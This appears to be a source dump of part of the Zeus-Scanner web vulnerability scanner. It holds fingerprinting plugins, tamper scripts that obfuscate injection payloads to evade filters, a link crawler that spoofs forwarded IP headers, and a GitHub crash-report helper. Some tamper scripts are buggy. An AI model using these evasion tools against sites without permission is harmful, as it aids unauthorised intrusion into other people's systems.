19 | if plugin.search(headers.get(lib.core.common.HTTP_HEADER.SERVER, "")) is not None:
20 | return True
21 |
--------------------------------------------------------------------------------
/lib/plugins/accellion.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | import lib.core.common
4 |
5 |
6 | __product__ = "Accellion-Secure-File-Transfer"
7 | __description__ = (
8 | "Accellion Secure File Transfer (SFT)"
9 | )
10 |
11 |
12 | def search(html, **kwargs):
13 | headers = kwargs.get("headers", None)
14 | plugin_detection_schema = (
15 | re.compile(r"/sfcurl.deleted./", re.I),
16 | re.compile(r"/\/courier\/[\d]+@\/mail_user_login\.html\?$/", re.I),
17 | )
18 | for plugin in plugin_detection_schema:
19 | if plugin.search(headers.get(lib.core.common.HTTP_HEADER.LOCATION, "")) is not None:
20 | return True
21 | if plugin.search(headers.get(lib.core.common.HTTP_HEADER.SET_COOKIE, "")) is not None:
22 | return True
23 |
--------------------------------------------------------------------------------
/lib/plugins/atomfeed.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "Atom Feed"
5 | __description__ = (
6 | "Atom Feeds allow software programs to check for updates published on a website"
7 | )
8 |
9 |
10 | def search(html, **kwargs):
11 | html = str(html)
12 | plugin_detection_schema = (
13 | re.compile(r"bmc.\w+.remedy.\w+.mid.\w+.tier.\w+.\d+.\d+...login<.+.>", re.I),
14 | re.compile(r".bmc.remedy.action.request.system.", re.I),
15 | re.compile(r"class.[\'\"]?caption[\'\"]?.\W{1,3}\w+..[0-9]{4}.bmc.software[,]?.inc[orporated]?.", re.I)
16 | )
--------------------------------------------------------------------------------
/lib/plugins/bomgar.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | import lib.core.common
4 |
5 |
6 | __product__ = "Bomgar"
7 | __description__ = (
8 | "Bomgar simplifies support by letting technicians control "
9 | "remote computers, servers, smartphones and network devices "
10 | "over the internet or network. With Bomgar, a support rep can "
11 | "see what customers see or control their computers for support"
12 | )
13 |
14 |
15 | def search(html, **kwargs):
16 | html = str(html)
17 | headers = kwargs.get("headers", None)
18 | plugin_detection_schema = (
19 | re.compile(".bomgar.", re.I),
20 | re.compile(r"http(s)?.//(www.)?bomgar.com", re.I),
21 | re.compile(r"alt.[\'\"]?remote.support.by.bomgar[\'\"]?", re.I)
22 | )
23 | for plugin in plugin_detection_schema:
24 | if plugin.search(headers.get(lib.core.common.HTTP_HEADER.SERVER, "")) is not None:
25 | return True
26 | if plugin.search(html) is not None:
27 | return True
28 |
--------------------------------------------------------------------------------
/lib/plugins/clipbucket.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "ClipBucket"
5 | __description__ = (
6 | "ClipBucket is an Open Source and freely downloadable PHP "
7 | "script that will let you start your own Video Sharing website"
8 | )
9 |
10 |
11 | def search(html, **kwargs):
12 | html = str(html)
13 | plugin_detection_schema = (
14 | re.compile(r"<.\S+.clipbucket", re.I),
15 | re.compile(r"content.[\'\"]clipbucket", re.I),
16 | re.compile(r"http(s)?.//(www.)?clip.bucket.com", re.I),
17 | re.compile(r"http(s)?.//(www.)?clipbucket.com", re.I),
18 | )
19 | for plugin in plugin_detection_schema:
20 | if plugin.search(html) is not None:
21 | return True
22 |
--------------------------------------------------------------------------------
/lib/plugins/googleapi.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "Google API"
5 | __description__ = (
6 | "Google APIs is a set of application programming interfaces (APIs) developed by Google "
7 | "which allow communication with Google Services and their integration to other services"
8 | )
9 |
10 |
11 | def search(html, **kwargs):
12 | html = str(html)
13 | plugin_detection_schema = (
14 | re.compile(r"src.[\'\"]?http(s)?.//googleapis.com", re.I),
15 | re.compile(r"src.[\'\"]?http(s)?.//ajax.googleapis.com", re.I),
16 | re.compile(r".googleapis.", re.I)
17 | )
18 | for plugin in plugin_detection_schema:
19 | if plugin.search(html) is not None:
20 | return True
21 |
--------------------------------------------------------------------------------
/lib/plugins/html5.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "HTML5"
5 | __description__ = (
6 | "HTML5 is a markup language used for structuring and presenting "
7 | "content on the World Wide Web. It is the fifth and current major "
8 | "version of the HTML standard."
9 | )
10 |
11 |
12 | def search(html, **kwargs):
13 | html = str(html)
14 | plugin_detection_schema = (
15 | re.compile(r".html5.", re.I),
16 | re.compile(r"\bhtml\d+", re.I)
17 | )
18 | for plugin in plugin_detection_schema:
19 | if plugin.search(html) is not None:
20 | return True
21 |
--------------------------------------------------------------------------------
/lib/plugins/ihtml.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | import lib.core.common
4 |
5 |
6 | __product__ = "iHTML"
7 | __description__ = (
8 | "iHTML is a server side internet/web programming and scripting "
9 | "language in used by thousands of sites worldwide to deliver "
10 | "cost effective dynamic database driven web sites"
11 | )
12 |
13 |
14 | def search(html, **kwargs):
15 | html = str(html)
16 | headers = kwargs.get("headers", None)
17 | plugin_detection_schema = (
18 | re.compile(r".ihtml.", re.I),
19 | re.compile(r"\bihtml.", re.I)
20 | )
21 | for plugin in plugin_detection_schema:
22 | if plugin.search(html) is not None:
23 | return True
24 | if plugin.search(headers.get(lib.core.common.HTTP_HEADER.X_POWERED_BY, "")) is not None:
25 | return True
26 |
--------------------------------------------------------------------------------
/lib/plugins/jquery.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "JQuery"
5 | __description__ = (
6 | "A fast, concise, JavaScript that simplifies how to traverse "
7 | "HTML documents, handle events, perform animations, and add AJAX"
8 | )
9 |
10 |
11 | def search(html, **kwargs):
12 | html = str(html)
13 | plugin_detection_schema = (
14 | re.compile(r"src.[\'\"]?http(s)?.//ajax.googleapis.com.ajax.libs.jquery.\d.\d.\d", re.I),
15 | re.compile(r".jquery.", re.I),
16 | re.compile(r"jquery.min.js", re.I)
17 | )
18 | for plugin in plugin_detection_schema:
19 | if plugin.search(html) is not None:
20 | return True
21 |
--------------------------------------------------------------------------------
/lib/plugins/moodle.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "Moodle"
5 | __description__ = (
6 | "Moodle is an opensource educational software written in PHP"
7 | )
8 |
9 |
10 | def search(html, **kwargs):
11 | html = str(html)
12 | plugin_detection_schema = (
13 | re.compile(r".moodle.", re.I),
14 | re.compile(r".moodlesession.", re.I),
15 | re.compile(r".php.moodlesession.(\w+)?(\d+)?", re.I)
16 | )
17 | for plugin in plugin_detection_schema:
18 | if plugin.search(html) is not None:
19 | return True
20 |
--------------------------------------------------------------------------------
/lib/plugins/mssqlreportmanager.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "Microsoft SQL Report Manager"
5 | __description__ = (
6 | "Microsoft SQL Server Report Manager - web-based report access and management tool"
7 | )
8 |
9 |
10 | def search(html, **kwargs):
11 | html = str(html)
12 | plugin_detection_schema = (
13 | re.compile(r"content.[\'\"]?microsoft.sql.server.report", re.I),
14 | re.compile(r"microsoft.sql.server.report.manager", re.I)
15 | )
16 | for plugin in plugin_detection_schema:
17 | if plugin.search(html) is not None:
18 | return True
19 |
--------------------------------------------------------------------------------
/lib/plugins/opengraph.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "Open-Graph-Protocol"
5 | __description__ = (
6 | "The Open Graph protocol enables you to integrate "
7 | "your Web pages into the social graph. It is currently "
8 | "designed for Web pages representing profiles of real-world "
9 | "things. Things like movies, sports teams, celebrities, "
10 | "and restaurants. Including Open Graph tags on your Web page, "
11 | "makes your page equivalent to a Facebook Page"
12 | )
13 |
14 |
15 | def search(html, **kwargs):
16 | html = str(html)
17 | plugin_detection_schema = (
18 | re.compile(r".og.title.", re.I),
19 | re.compile(".fb.admins.", re.I),
20 | re.compile(r".og.type.", re.I),
21 | re.compile(r".fb.app.id.", re.I)
22 | )
23 | for plugin in plugin_detection_schema:
24 | if plugin.search(html) is not None:
25 | return True
26 |
--------------------------------------------------------------------------------
/lib/plugins/openxchange.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | import lib.core.common
4 |
5 |
6 | __product__ = "Open-Xchange-Server"
7 | __description__ = (
8 | "Open Xchange Mail Server"
9 | )
10 |
11 |
12 | def search(html, **kwargs):
13 | html = str(html)
14 | headers = kwargs.get("headers", None)
15 | plugin_detection_schema = (
16 | re.compile(r"open.xchange.server", re.I),
17 | re.compile(r"javascript.to.access.the.open.xchange.server", re.I),
18 | re.compile(r"/^http(s)?://(www.)?[^\/]+\/ox6\/ox\.html$/", re.I)
19 | )
20 | for plugin in plugin_detection_schema:
21 | if plugin.search(html) is not None:
22 | return True
23 | if plugin.search(headers.get(lib.core.common.HTTP_HEADER.LOCATION, "")) is not None:
24 | return True
25 |
--------------------------------------------------------------------------------
/lib/plugins/rssfeed.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "RSS Feed"
5 | __description__ = (
6 | "RSS (Rich Site Summary) is a type of web feed which allows "
7 | "users to access updates to online content in a standardized, "
8 | "computer-readable format"
9 | )
10 |
11 |
12 | def search(html, **kwargs):
13 | html = str(html)
14 | plugin_detection_schema = (
15 | re.compile(r"type.[\'\"]?application/rss.xml[\'\"]?", re.I),
16 | re.compile(r"title.[\'\"]?rss.feed[\'\"]?", re.I)
17 | )
18 | for plugin in plugin_detection_schema:
19 | if plugin.search(html) is not None:
20 | return True
21 |
--------------------------------------------------------------------------------
/lib/tamper_scripts/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/lib/tamper_scripts/__init__.py
--------------------------------------------------------------------------------
/lib/tamper_scripts/appendnull_encode.py:
--------------------------------------------------------------------------------
1 | def tamper(payload, **kwargs):
2 | return "{}%00".format(payload.strip())
--------------------------------------------------------------------------------
/lib/tamper_scripts/base64_encode.py:
--------------------------------------------------------------------------------
1 | import base64
2 |
3 | from lib.core.settings import (
4 | logger,
5 | set_color
6 | )
7 |
8 |
9 | def tamper(payload, **kwargs):
10 | warning = kwargs.get("warning", True)
11 | if warning:
12 | logger.warning(set_color(
13 | "base64 tamper scripts may increase the possibility of not finding vulnerabilities "
14 | "in otherwise vulnerable sites", level=30
15 | ))
16 | return base64.b64encode(payload)
--------------------------------------------------------------------------------
/lib/tamper_scripts/enclosebrackets_encode.py:
--------------------------------------------------------------------------------
1 | import string
2 |
3 | from lib.core.settings import (
4 | logger,
5 | set_color
6 | )
7 |
8 |
9 | def tamper(payload, **kwargs):
10 | warning = kwargs.get("warning", True)
11 |
12 | if warning:
13 | logger.warning(set_color(
14 | "enclosing brackets is meant to be used as an obfuscation "
15 | "against an already valid vulnerable site", level=30
16 | ))
17 |
18 | to_enclose = string.digits
19 | retval = ""
20 | for char in payload:
21 | if char in to_enclose:
22 | char = "['{}']".format(char)
23 | retval += char
24 | else:
25 | retval += char
26 | return retval
--------------------------------------------------------------------------------
/lib/tamper_scripts/hex_encode.py:
--------------------------------------------------------------------------------
1 | from lib.core.settings import (
2 | logger,
3 | set_color
4 | )
5 |
6 |
7 | def tamper(payload, **kwargs):
8 | warning = kwargs.get("warning", True)
9 | if warning:
10 | logger.warning(set_color(
11 | "hex tamper scripts may increase the risk of false positives", level=30
12 | ))
13 | retval = hex(hash(payload))
14 | if "-" in str(retval):
15 | return retval[1:-1]
16 | else:
17 | return retval
18 |
--------------------------------------------------------------------------------
/lib/tamper_scripts/lowercase_encode.py:
--------------------------------------------------------------------------------
1 | def tamper(payload, **kwargs):
2 | return str(payload).lower()
--------------------------------------------------------------------------------
/lib/tamper_scripts/multispace2comment_encode.py:
--------------------------------------------------------------------------------
1 | import random
2 |
3 |
4 | def tamper(payload, **kwargs):
5 | possible_spaces = [2, 3, 4]
6 | retval = ""
7 | encoder = "/**/"
8 | for char in retval:
9 | if char == " ":
10 | retval += encoder * random.choice(possible_spaces)
11 | else:
12 | retval += char
13 | return retval
--------------------------------------------------------------------------------
/lib/tamper_scripts/obfuscateentity_encode.py:
--------------------------------------------------------------------------------
1 | from lib.core.settings import (
2 | logger,
3 | set_color
4 | )
5 |
6 |
7 | def tamper(payload, **kwargs):
8 | warning = kwargs.get("warning", True)
9 |
10 | if warning:
11 | logger.warning(set_color(
12 | "obfuscating payloads by their entity encoding equivalent may increase the "
13 | "risk of false positives", level=30
14 | ))
15 |
16 | skip = ";"
17 | encoding_schema = {
18 | " ": " ", "<": "<", ">": ">",
19 | "&": "&", '"': """, "'": "'",
20 | }
21 | retval = ""
22 | for char in str(payload):
23 | if char in encoding_schema.iterkeys():
24 | retval += encoding_schema[char]
25 | elif char not in encoding_schema.iterkeys() and char != skip:
26 | retval += char
27 | else:
28 | retval += char
29 | return retval
30 |
--------------------------------------------------------------------------------
/lib/tamper_scripts/obfuscateordinal_encode.py:
--------------------------------------------------------------------------------
1 | from lib.core.settings import (
2 | logger,
3 | set_color
4 | )
5 |
6 |
7 | def tamper(payload, **kwargs):
8 | warning = kwargs.get("warning", True)
9 |
10 | if warning:
11 | logger.warning(set_color(
12 | "obfuscating the payloads by ordinal equivalents may increase the risk "
13 | "of false positives", level=30
14 | ))
15 |
16 | retval = ""
17 | danger_characters = "%&<>/\\;'\""
18 | for char in payload:
19 | if char in danger_characters:
20 | char = "%{}".format(ord(char) * 10 / 7)
21 | retval += char
22 | else:
23 | retval += char
24 | return retval
--------------------------------------------------------------------------------
/lib/tamper_scripts/randomcase_encode.py:
--------------------------------------------------------------------------------
1 | import random
2 |
3 |
4 | def tamper(payload, **kwargs):
5 | retval = ""
6 | nums = [0, 1]
7 |
8 | for char in payload:
9 | random_int = random.choice(nums)
10 | if random_int == 1:
11 | if char.isupper():
12 | retval += char.lower()
13 | elif char.islower():
14 | retval += char.upper()
15 | else:
16 | retval += char
17 | return retval
18 |
--------------------------------------------------------------------------------
/lib/tamper_scripts/space2comment_encode.py:
--------------------------------------------------------------------------------
1 | def tamper(payload, **kwargs):
2 | retval = ""
3 | encoder = "/**/"
4 | for char in payload:
5 | if char == " ":
6 | char = encoder
7 | retval += char
8 | else:
9 | retval += char
10 | return retval
--------------------------------------------------------------------------------
/lib/tamper_scripts/space2null_encode.py:
--------------------------------------------------------------------------------
1 | from lib.core.settings import (
2 | logger,
3 | set_color
4 | )
5 |
6 |
7 | def tamper(payload, **kwargs):
8 | warning = kwargs.get("warning", True)
9 | if warning:
10 | logger.warning(set_color(
11 | "NULL encoding tamper scripts may increase the possibility of not finding vulnerabilities "
12 | "in otherwise vulnerable sites", level=30
13 | ))
14 |
15 | retval = ""
16 | encoder = "%00"
17 | for char in payload:
18 | if char == " ":
19 | char = encoder
20 | retval += char
21 | else:
22 | retval += char
23 | return retval
--------------------------------------------------------------------------------
/lib/tamper_scripts/unicode_encode.py:
--------------------------------------------------------------------------------
1 | def tamper(payload, **kwargs):
2 | i = 0
3 | retval = ""
4 |
5 | while i < len(payload):
6 | retval += "%u{}".format(ord(payload[i]))
7 | i += 1
8 | return retval
9 |
--------------------------------------------------------------------------------
/lib/tamper_scripts/uppercase_encode.py:
--------------------------------------------------------------------------------
1 | def tamper(payload, **kwargs):
2 | return str(payload).upper()
--------------------------------------------------------------------------------
/lib/tamper_scripts/url_encode.py:
--------------------------------------------------------------------------------
1 | # coding=utf-8
2 |
3 |
4 | def tamper(payload, safe="%&=-_", **kwargs):
5 | encodings = {
6 | " ": "%20", "!": "%21", '"': "%22", "#": "%23", "$": "%24", "%": "%25", "'": "%27",
7 | "(": "%28", ")": "%29", "*": "%2A", "+": "%2B", ",": "%2C", ".": "%2E", "/": "%2F",
8 | "0": "%30", "1": "%31", "2": "%32", "3": "%33", "4": "%34", "5": "%35", "6": "%36", "7": "%37",
9 | "8": "%38", "9": "%39", ":": "%3A", ";": "%3B", "<": "%3C", ">": "%3E", "?": "%3F",
10 | "@": "%40", "A": "%41", "B": "%42", "C": "%43", "D": "%44", "E": "%45", "F": "%46", "G": "%47",
11 | "H": "%48", "I": "%49", "J": "%4A", "K": "%4B", "L": "%4C", "M": "%4D", "N": "%4E", "O": "%4F",
12 | "P": "%50", "Q": "%51", "R": "%52", "S": "%53", "T": "%54", "U": "%55", "V": "%56", "W": "%57",
13 | "X": "%58", "Y": "%59", "Z": "%5A", "[": "%5B", "\\": "%5C", "]": "%5D", "^": "%5E", "a": "%61",
14 | "b": "%62", "c": "%63", "d": "%64", "e": "%65", "f": "%66", "g": "%67", "h": "%68", "i": "%69",
15 | "j": "%6A", "k": "%6B", "l": "%6C", "m": "%6D", "n": "%6E", "o": "%6F", "p": "%70", "q": "%71",
16 | "r": "%72", "s": "%73", "t": "%74", "u": "%75", "v": "%76", "w": "%77", "x": "%78", "y": "%79",
17 | "z": "%7A", "{": "%7B", "|": "%7C", "}": "%7D", "~": "%7E", "`": "%80", "": "%81", "‚": "%82",
18 | "ƒ": "%83", "„": "%84", "…": "%85", "†": "%86", "‡": "%87", "ˆ": "%88", "‰": "%89", "Š": "%8A",
19 | "‹": "%8B", "Œ": "%8C", "Ž": "%8E", "‘": "%91", "’": "%92", "“": "%93", "”": "%94", "•": "%95",
20 | "–": "%96", "—": "%97", "˜": "%98", "™": "%99", "š": "%9A", "›": "%9B", "œ": "%9C", "ž": "%9E",
21 | "Ÿ": "%9F", "¡": "%A1", "¢": "%A2", "£": "%A3", "¤": "%A4", "¥": "%A5", "¦": "%A6", "§": "%A7",
22 | "¨": "%A8", "©": "%A9", "ª": "%AA", "«": "%AB", "¬": "%AC", "": "%AD", "®": "%AE", "¯": "%AF",
23 | "°": "%B0", "±": "%B1", "²": "%B2", "³": "%B3", "´": "%B4", "µ": "%B5", "¶": "%B6", "·": "%B7",
24 | "¸": "%B8", "¹": "%B9", "º": "%BA", "»": "%BB", "¼": "%BC", "½": "%BD", "¾": "%BE", "¿": "%BF",
25 | "À": "%C0", "Á": "%C1", "Â": "%C2", "Ã": "%C3", "Ä": "%C4", "Å": "%C5", "Æ": "%C6", "Ç": "%C7",
26 | "È": "%C8", "É": "%C9", "Ê": "%CA", "Ë": "%CB", "Ì": "%CC", "Í": "%CD", "Î": "%CE", "Ï": "%CF",
27 | "Ð": "%D0", "Ñ": "%D1", "Ò": "%D2", "Ó": "%D3", "Ô": "%D4", "Õ": "%D5", "Ö": "%D6", "×": "%D7",
28 | "Ø": "%D8", "Ù": "%D9", "Ú": "%DA", "Û": "%DB", "Ü": "%DC", "Ý": "%DD", "Þ": "%DE", "ß": "%DF",
29 | "à": "%E0", "á": "%E1", "â": "%E2", "ã": "%E3", "ä": "%E4", "å": "%E5", "æ": "%E6", "ç": "%E7",
30 | "è": "%E8", "é": "%E9", "ê": "%EA", "ë": "%EB", "ì": "%EC", "í": "%ED", "î": "%EE", "ï": "%EF",
31 | "ð": "%F0", "ñ": "%F1", "ò": "%F2", "ó": "%F3", "ô": "%F4", "õ": "%F5", "ö": "%F6", "÷": "%F7",
32 | "ø": "%F8", "ù": "%F9", "ú": "%FA", "û": "%FB", "ü": "%FC", "ý": "%FD", "þ": "%FE", "ÿ": "%FF"
33 | }
34 | retval = ""
35 | if isinstance(payload, unicode):
36 | payload = str(payload)
37 | for char in payload:
38 | if char not in safe:
39 | try:
40 | retval += encodings[char]
41 | except KeyError:
42 | retval += char
43 | else:
44 | retval += char
45 | return retval
46 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | selenium==3.5.0
2 | requests==2.12.2
3 | python-nmap==0.6.1
4 | whichcraft==0.4.1
5 | pyvirtualdisplay==0.2.1
6 | lxml==3.7.3
7 | psutil==5.0.1
8 | beautifulsoup4==4.6.0
--------------------------------------------------------------------------------
/var/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/var/__init__.py
--------------------------------------------------------------------------------
/var/auto_issue/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/var/auto_issue/__init__.py
--------------------------------------------------------------------------------
/var/auto_issue/github.py:
--------------------------------------------------------------------------------
1 | import re
2 | import sys
3 | try:
4 | import urllib2 # python 2
5 | except ImportError:
6 | import urllib.request as urllib2 # python 3
7 | import json
8 | import platform
9 |
10 | import requests
11 | from bs4 import BeautifulSoup
12 |
13 | import lib.core.common
14 | import lib.core.settings
15 |
16 |
17 | def find_url(params, search="https://github.com/ekultek/zeus-scanner/issues"):
18 | """
19 | get the URL that your issue is created at
20 | """
21 | retval = "https://github.com{}"
22 | href = None
23 | searcher = re.compile(params, re.I)
24 | req = requests.get(search)
25 | status, html = req.status_code, req.content
26 | if status == 200:
27 | split_information = str(html).split("\n")
28 | for i, line in enumerate(split_information):
29 | if searcher.search(line) is not None:
30 | href = split_information[i-1]
31 | if href is not None:
32 | soup = BeautifulSoup(href, "html.parser")
33 | for item in soup.findAll("a"):
34 | link = item.get("href")
35 | return retval.format(link)
36 | return None
37 |
38 |
39 | def request_issue_creation():
40 | if not lib.core.settings.get_md5sum():
41 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
42 | "it appears that your checksums did not match, therefore it is assumed "
43 | "that you have edited some of the code, issue request denied", level=50
44 | ))
45 | lib.core.common.shutdown()
46 |
47 | question = lib.core.common.prompt(
48 | "would you like to create an anonymous issue and post it to Zeus's Github", opts="yN"
49 | )
50 | if question.lower().startswith("n"):
51 | lib.core.settings.logger.error(lib.core.settings.set_color(
52 | "Zeus has experienced an internal error and cannot continue, shutting down", level=40
53 | ))
54 | lib.core.common.shutdown()
55 |
56 | lib.core.settings.fix_log_file()
57 | lib.core.settings.logger.info(lib.core.settings.set_color(
58 | "Zeus got an unexpected error and will automatically create an issue for this error, please wait"
59 | ))
60 |
61 | def __extract_stacktrace(file_data):
62 | lib.core.settings.logger.info(lib.core.settings.set_color(
63 | "extracting traceback from log file"
64 | ))
65 | retval, buff_mode, _buffer = [], False, ""
66 | with open(file_data, "r+") as log:
67 | for line in log:
68 | if "Traceback" in line:
69 | buff_mode = True
70 | if line and len(line) < 5:
71 | buff_mode = False
72 | retval.append(_buffer)
73 | _buffer = ""
74 | if buff_mode:
75 | if len(line) > 400:
76 | line = line[:400] + "\n"
77 | _buffer += line
78 | return "".join(retval)
79 |
80 | lib.core.settings.logger.info(lib.core.settings.set_color(
81 | "getting authorization"
82 | ))
83 |
84 | token = lib.core.settings.get_token(lib.core.settings.GITHUB_AUTH_PATH)
85 |
86 | current_log_file = lib.core.settings.get_latest_log_file(lib.core.settings.CURRENT_LOG_FILE_PATH)
87 | stacktrace = __extract_stacktrace(current_log_file)
88 | identifier = lib.core.settings.create_identifier(stacktrace)
89 | issue_title = "Unhandled exception ({})".format(identifier)
90 | ff_version = lib.core.settings.get_browser_version()
91 | log_file_information = lib.core.settings.tails(current_log_file)
92 |
93 | issue_data = {
94 | "title": issue_title,
95 | "body": "Zeus version:\n`{}`\n\n"
96 | "Firefox version:\n`{}`\n\n"
97 | "Geckodriver version:\n`{}`\n\n"
98 | "Error info:\n```{}```\n\n"
99 | "Running details:\n`{}`\n\n"
100 | "Commands used:\n`{}`\n\n"
101 | "Log file info:\n```{}```".format(
102 | lib.core.settings.VERSION,
103 | "{}".format(ff_version),
104 | open(lib.core.settings.GECKO_VERSION_INFO_PATH).read(),
105 | str(stacktrace),
106 | str(platform.platform()),
107 | " ".join(sys.argv),
108 | log_file_information
109 | ),
110 | }
111 |
112 | _json_data = json.dumps(issue_data)
113 | if sys.version_info > (3,): # python 3
114 | _json_data = _json_data.encode("utf-8")
115 |
116 | try:
117 | req = urllib2.Request(
118 | url="https://api.github.com/repos/ekultek/zeus-scanner/issues", data=_json_data,
119 | headers={"Authorization": "token {}".format(token)}
120 | )
121 | urllib2.urlopen(req, timeout=10).read()
122 | lib.core.settings.logger.info(lib.core.settings.set_color(
123 | "issue has been created successfully with the following name '{}', your unique identifier "
124 | "for this issue is '{}' and the URL to your issue is '{}'".format(
125 | issue_title, identifier, find_url(identifier)
126 | )
127 | ))
128 | except Exception as e:
129 | lib.core.settings.logger.exception(lib.core.settings.set_color(
130 | "failed to auto create the issue, got exception '{}', "
131 | "you may manually create an issue".format(e), level=50
132 | ))
133 |
--------------------------------------------------------------------------------
/var/blackwidow/__init__.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 | from bs4 import BeautifulSoup
4 |
5 | import lib.core.errors
6 | import lib.core.common
7 | import lib.core.settings
8 | import var.auto_issue.github
9 |
10 |
11 | class Blackwidow(object):
12 |
13 | """
14 | spider to scrape a webpage for all available URL's
15 | """
16 |
17 | def __init__(self, url, user_agent=None, proxy=None, forward=None):
18 | self.url = url
19 | self.forward = forward or None
20 | self.proxy = proxy
21 | self.user_agent = user_agent or lib.core.settings.DEFAULT_USER_AGENT
22 |
23 | @staticmethod
24 | def get_url_ext(url):
25 | """
26 | get the extension of the URL
27 | """
28 | try:
29 | data = url.split(".")
30 | return data[-1] in lib.core.settings.SPIDER_EXT_EXCLUDE
31 | except (IndexError, Exception):
32 | pass
33 |
34 | def test_connection(self):
35 | """
36 | make sure the connection is good before you continue
37 | """
38 | try:
39 | # we'll skip SSL verification to avoid any SSLErrors that might
40 | # arise, we won't really need it with this anyways
41 | attempt, status, _, _ = lib.core.common.get_page(
42 | self.url, agent=self.user_agent, xforward=self.forward, skip_verf=True,
43 | proxy=self.proxy
44 | )
45 | if status == 200:
46 | return "ok", None
47 | return "fail", attempt.status_code
48 | except Exception as e:
49 | if "Max retries exceeded with url" in str(e):
50 | info_msg = ""
51 | if "https://" in self.url:
52 | info_msg += ", try dropping https:// to http://"
53 | else:
54 | info_msg += ""
55 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
56 | "provided website '{}' is refusing connection{}".format(
57 | self.url, info_msg
58 | ), level=50
59 | ))
60 | lib.core.common.shutdown()
61 | else:
62 | lib.core.settings.logger.exception(lib.core.settings.set_color(
63 | "failed to connect to '{}' received error '{}'".format(
64 | self.url, e
65 | ), level=50
66 | ))
67 | var.auto_issue.github.request_issue_creation()
68 | lib.core.common.shutdown()
69 |
70 | def scrape_page_for_links(self, given_url, attribute="a", descriptor="href"):
71 | """
72 | scrape the webpage's HTML for usable GET links
73 | """
74 | unique_links = set()
75 | true_url = lib.core.settings.replace_http(given_url)
76 | _, status, html_page, _ = lib.core.common.get_page(
77 | given_url, agent=self.user_agent, proxy=self.proxy
78 | )
79 | soup = BeautifulSoup(html_page, "html.parser")
80 | for link in soup.findAll(attribute):
81 | found_redirect = str(link.get(descriptor)).decode("unicode_escape")
82 | if found_redirect is not None and lib.core.settings.URL_REGEX.match(found_redirect):
83 | unique_links.add(found_redirect)
84 | else:
85 | unique_links.add("http://{}/{}".format(true_url, found_redirect))
86 | return list(unique_links)
87 |
88 |
89 | def blackwidow_main(url, **kwargs):
90 | """
91 | scrape a given URL for all available links
92 | """
93 | verbose = kwargs.get("verbose", False)
94 | proxy = kwargs.get("proxy", None)
95 | agent = kwargs.get("agent", None)
96 | forward = kwargs.get("forward", None)
97 |
98 | if forward is not None:
99 | forward = (
100 | lib.core.settings.create_random_ip(),
101 | lib.core.settings.create_random_ip(),
102 | lib.core.settings.create_random_ip()
103 | )
104 |
105 | if verbose:
106 | lib.core.settings.logger.debug(lib.core.settings.set_color(
107 | "settings user-agent to '{}'".format(agent), level=10
108 | ))
109 | if proxy is not None:
110 | if verbose:
111 | lib.core.settings.logger.debug(lib.core.settings.set_color(
112 | "running behind proxy '{}'".format(proxy), level=10
113 | ))
114 | lib.core.settings.create_dir("{}/{}".format(os.getcwd(), "log/blackwidow-log"))
115 | lib.core.settings.logger.info(lib.core.settings.set_color(
116 | "starting blackwidow on '{}'".format(url)
117 | ))
118 | crawler = Blackwidow(url, user_agent=agent, proxy=proxy, forward=forward)
119 | if verbose:
120 | lib.core.settings.logger.debug(lib.core.settings.set_color(
121 | "testing connection to the URL", level=10
122 | ))
123 | test_code = crawler.test_connection()
124 | if not test_code[0] == "ok":
125 | error_msg = (
126 | "connection test failed with status code: {}, reason: '{}'. "
127 | "test connection needs to pass, try a different link"
128 | )
129 | for error_code in lib.core.common.STATUS_CODES.keys():
130 | if error_code == test_code[1]:
131 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
132 | error_msg.format(
133 | test_code[1], lib.core.common.STATUS_CODES[error_code].title()
134 | ), level=50
135 | ))
136 | lib.core.common.shutdown()
137 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
138 | error_msg.format(
139 | test_code[1], lib.core.common.STATUS_CODES["other"].title()
140 | ), level=50
141 | ))
142 | lib.core.common.shutdown()
143 | else:
144 | lib.core.settings.logger.info(lib.core.settings.set_color(
145 | "connection test succeeded, continuing", level=25
146 | ))
147 | lib.core.settings.logger.info(lib.core.settings.set_color(
148 | "crawling given URL '{}' for links".format(url)
149 | ))
150 | found = crawler.scrape_page_for_links(url)
151 | if len(found) > 0:
152 | lib.core.settings.logger.info(lib.core.settings.set_color(
153 | "found a total of {} links from given URL '{}'".format(
154 | len(found), url
155 | ), level=25
156 | ))
157 | lib.core.common.write_to_log_file(found, path=lib.core.settings.SPIDER_LOG_PATH,
158 | filename=lib.core.settings.BLACKWIDOW_FILENAME)
159 | else:
160 | lib.core.settings.logger.fatal(lib.core.settings.set_color(
161 | "did not find any usable links from '{}'".format(url), level=50
162 | ))
--------------------------------------------------------------------------------
/var/search/__init__.py:
--------------------------------------------------------------------------------
1 | import whichcraft
2 | from selenium import webdriver
3 | from selenium.webdriver.common.proxy import *
4 | from selenium.webdriver.remote.errorhandler import WebDriverException
5 |
6 | from lib.core.common import HTTP_HEADER
7 | from lib.core.settings import (
8 | logger,
9 | set_color,
10 | create_random_ip,
11 | DEFAULT_USER_AGENT
